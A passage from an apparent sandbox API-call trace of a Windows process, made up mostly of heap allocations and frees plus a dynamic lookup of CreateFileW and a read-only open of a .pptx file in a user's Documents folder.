hHeap=0x1780000) returned 1 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0078.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0078.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0078.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0078.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0078.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0078.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0078.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0078.365] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0078.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0078.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0078.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0078.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.368] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.370] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0078.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca6b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0078.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.371] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0078.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0078.372] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\z_hkc3lg6.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0078.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0078.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0078.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0078.373] RtlAllocateHeap 